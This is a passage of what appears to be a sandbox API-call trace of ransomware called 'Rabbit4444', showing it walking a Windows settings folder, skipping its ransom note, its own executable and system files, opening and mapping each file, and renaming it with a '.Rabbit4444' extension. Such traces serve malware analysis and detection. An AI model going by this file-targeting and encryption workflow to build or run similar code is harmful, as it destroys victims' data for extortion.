(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{75ac9145-7ec9-4883-82a7-ad3429020aa0}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{75ac9145-7ec9-4883-82a7-ad3429020aa0}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.011] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51df2032, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51df2032, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224d97aa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x484, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", cAlternateFileName="CL2BEC~1.SET")) returned 1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2=".") returned 1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2="..") returned 1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2="windows") returned -1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2="boot") returned 1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.011] lstrcmpiW (lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.011] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms" | out: lpString1="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms") returned="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms" [0059.011] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.011] lstrlenW (lpString="Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms") returned 64 [0059.012] lstrlenW (lpString="Rabbit4444") returned 10 [0059.012] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.012] lstrlenW (lpString=".dll") returned 4 [0059.012] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.012] lstrlenW (lpString=".lnk") returned 4 [0059.012] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.012] lstrlenW (lpString=".ini") returned 4 [0059.012] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.012] lstrlenW (lpString=".sys") returned 4 [0059.012] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.012] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{76f31a78-3fda-4f80-b015-95cfd81463ad}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.012] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.012] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15032289318) returned 1 [0059.012] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1156) returned 1 [0059.012] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0059.012] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0059.012] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0059.014] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0059.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.014] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.015] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.015] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.015] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.015] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15032560480) returned 1 [0059.015] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0059.015] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0059.015] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.015] CloseHandle (hObject=0x298) returned 1 [0059.015] CloseHandle (hObject=0x278) returned 1 [0059.015] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms.Rabbit4444") returned 192 [0059.015] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{76f31a78-3fda-4f80-b015-95cfd81463ad}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{76f31a78-3fda-4f80-b015-95cfd81463ad}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.016] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51f23309, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51f23309, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23052c93, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x46b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", cAlternateFileName="CL0E63~1.SET")) returned 1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2=".") returned 1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2="..") returned 1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2="windows") returned -1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2="boot") returned 1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.016] lstrcmpiW (lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.016] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms" | out: lpString1="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms") returned="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms" [0059.016] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.017] lstrlenW (lpString="Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms") returned 64 [0059.017] lstrlenW (lpString="Rabbit4444") returned 10 [0059.017] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.017] lstrlenW (lpString=".dll") returned 4 [0059.017] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.017] lstrlenW (lpString=".lnk") returned 4 [0059.017] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.017] lstrlenW (lpString=".ini") returned 4 [0059.020] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.020] lstrlenW (lpString=".sys") returned 4 [0059.020] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.020] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.020] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.020] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15033090498) returned 1 [0059.020] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1131) returned 1 [0059.020] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0059.020] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0059.020] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x298 [0059.021] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0059.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.023] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15033343776) returned 1 [0059.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0059.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0059.023] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.023] CloseHandle (hObject=0x298) returned 1 [0059.023] CloseHandle (hObject=0x278) returned 1 [0059.023] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms.Rabbit4444") returned 192 [0059.023] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.024] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52302ffe, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x52302ffe, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2216c19d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", cAlternateFileName="CL2DE9~1.SET")) returned 1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2=".") returned 1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2="..") returned 1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2="windows") returned -1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2="boot") returned 1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.024] lstrcmpiW (lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.024] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms" | out: lpString1="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms") returned="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms" [0059.024] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.025] lstrlenW (lpString="Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms") returned 64 [0059.025] lstrlenW (lpString="Rabbit4444") returned 10 [0059.025] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.025] lstrlenW (lpString=".dll") returned 4 [0059.025] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.025] lstrlenW (lpString=".lnk") returned 4 [0059.025] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.025] lstrlenW (lpString=".ini") returned 4 [0059.025] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.025] lstrlenW (lpString=".sys") returned 4 [0059.025] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.025] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7abbe8e6-757f-419a-b2e0-07d5694f8e0f}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.025] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.025] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15033599694) returned 1 [0059.025] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=944) returned 1 [0059.025] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.025] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0059.025] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.026] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.027] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.028] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15033850604) returned 1 [0059.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0059.028] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.028] CloseHandle (hObject=0x298) returned 1 [0059.028] CloseHandle (hObject=0x278) returned 1 [0059.028] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms.Rabbit4444") returned 192 [0059.028] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7abbe8e6-757f-419a-b2e0-07d5694f8e0f}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7abbe8e6-757f-419a-b2e0-07d5694f8e0f}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.029] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524a69ee, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x524a69ee, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232b5237, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", cAlternateFileName="CL1958~1.SET")) returned 1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2=".") returned 1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2="..") returned 1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2="windows") returned -1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2="boot") returned 1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.029] lstrcmpiW (lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.029] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms" | out: lpString1="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms") returned="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms" [0059.029] SetFileAttributesW 